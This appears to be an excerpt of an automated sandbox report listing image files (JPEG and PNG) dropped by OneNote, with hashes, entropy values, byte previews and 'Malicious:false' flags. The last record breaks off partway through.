                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):40035
                                                                                                        Entropy (8bit):7.360144465307449
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
                                                                                                        MD5:B1DDD365D87605F96D72042CB56572F6
                                                                                                        SHA1:ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
                                                                                                        SHA-256:06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
                                                                                                        SHA-512:9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R*.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$.*.r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<|..1/.|.....b..-..y....]U#Ctn.7m.._.|..2I;|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):242903
                                                                                                        Entropy (8bit):7.944495275553473
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
                                                                                                        MD5:C594A4AA7234EF91E6C2714CFE1410F1
                                                                                                        SHA1:C0F720D4CE3196852814D0B7347F0CAA0C6FD526
                                                                                                        SHA-256:10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
                                                                                                        SHA-512:7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):70028
                                                                                                        Entropy (8bit):7.742089280742944
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
                                                                                                        MD5:EC7811912ACA47F6AEB912469761D70D
                                                                                                        SHA1:C759BC2D908705D599B03BDB366C951B11F99A4E
                                                                                                        SHA-256:FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
                                                                                                        SHA-512:881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):24268
                                                                                                        Entropy (8bit):6.946124661664625
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                        MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                        SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                        SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                        SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):47294
                                                                                                        Entropy (8bit):7.497888607667405
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
                                                                                                        MD5:7A450E086AD14BA7D89BA5DB3D3AE6C7
                                                                                                        SHA1:E7AEAFCFCE476390E18C19456BDF6529D863D518
                                                                                                        SHA-256:BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
                                                                                                        SHA-512:9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1|....[...jQ.%Zb.......t..........*..V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=*N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 60 x 336, 4-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):347
                                                                                                        Entropy (8bit):6.85024426015615
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
                                                                                                        MD5:78762C169F8B104CB57DFF5A1669D2DF
                                                                                                        SHA1:9638B71B584CD636834016A635ABF8D9C0887711
                                                                                                        SHA-256:E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
                                                                                                        SHA-512:5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 40 x 617, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):827
                                                                                                        Entropy (8bit):7.23139555596658
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
                                                                                                        MD5:3E675D61F588462FB452342B14BCF9C0
                                                                                                        SHA1:86B62019BC3C5BE48B654256B5D10293FC8C842A
                                                                                                        SHA-256:639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
                                                                                                        SHA-512:E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.|.._...7..D..Ya.l.....{.@&.|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 50 x 600, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4410
                                                                                                        Entropy (8bit):7.857636973514526
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
                                                                                                        MD5:2494381A1ACDC83843B912CFCDE5643B
                                                                                                        SHA1:98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
                                                                                                        SHA-256:5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
                                                                                                        SHA-512:0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}|..{'.U..~......}....s.............,CVu.x.:C..5...;.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):136726
                                                                                                        Entropy (8bit):7.973487854173386
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
                                                                                                        MD5:4A2472AC2A9434E35701362D1C56EDDF
                                                                                                        SHA1:16FA2EA2D2808D75445896E03B67A93000EEDDD8
                                                                                                        SHA-256:505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
                                                                                                        SHA-512:5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 77 x 627, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5136
                                                                                                        Entropy (8bit):7.622045262603241
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
                                                                                                        MD5:FA38AFA965141EA3F17863EE8DCCDE61
                                                                                                        SHA1:2B4611E651AF7549C1AA73932B1136B561A7602F
                                                                                                        SHA-256:E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
                                                                                                        SHA-512:A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):52945
                                                                                                        Entropy (8bit):7.6490972666456765
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                        MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                        SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                        SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                        SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):79656
                                                                                                        Entropy (8bit):7.966459570826366
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
                                                                                                        MD5:39FF3ACAE544EAC172B1269F825B9E9F
                                                                                                        SHA1:2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
                                                                                                        SHA-256:70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
                                                                                                        SHA-512:3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\.*.N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........|..4.wJ*..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):40884
                                                                                                        Entropy (8bit):7.545929039957292
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                        MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                        SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                        SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                        SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):68633
                                                                                                        Entropy (8bit):7.709776384921022
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                        MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                        SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                        SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                        SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 176 x 513, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11043
                                                                                                        Entropy (8bit):7.96811228801767
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
                                                                                                        MD5:8E9AB9C28B155A66BC5C0DA5E2A4EFB5
                                                                                                        SHA1:972E61F162D48F1CEE21963ECBB2FE439105DB55
                                                                                                        SHA-256:B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
                                                                                                        SHA-512:12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.|.L.|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....|.)
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 40 x 650, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):647
                                                                                                        Entropy (8bit):6.854433034679255
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
                                                                                                        MD5:DD876AA103BEC3AC83C769D768AD39FB
                                                                                                        SHA1:1833603AA9B6A7E53F9AD8A336F96CCE33088234
                                                                                                        SHA-256:1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
                                                                                                        SHA-512:946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):52912
                                                                                                        Entropy (8bit):7.679147474806877
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
                                                                                                        MD5:1122BF4C2A42B4FA7F29D3C94954A7C9
                                                                                                        SHA1:3750077A830FE21735A43ABD35C63BA9A4D4B0DE
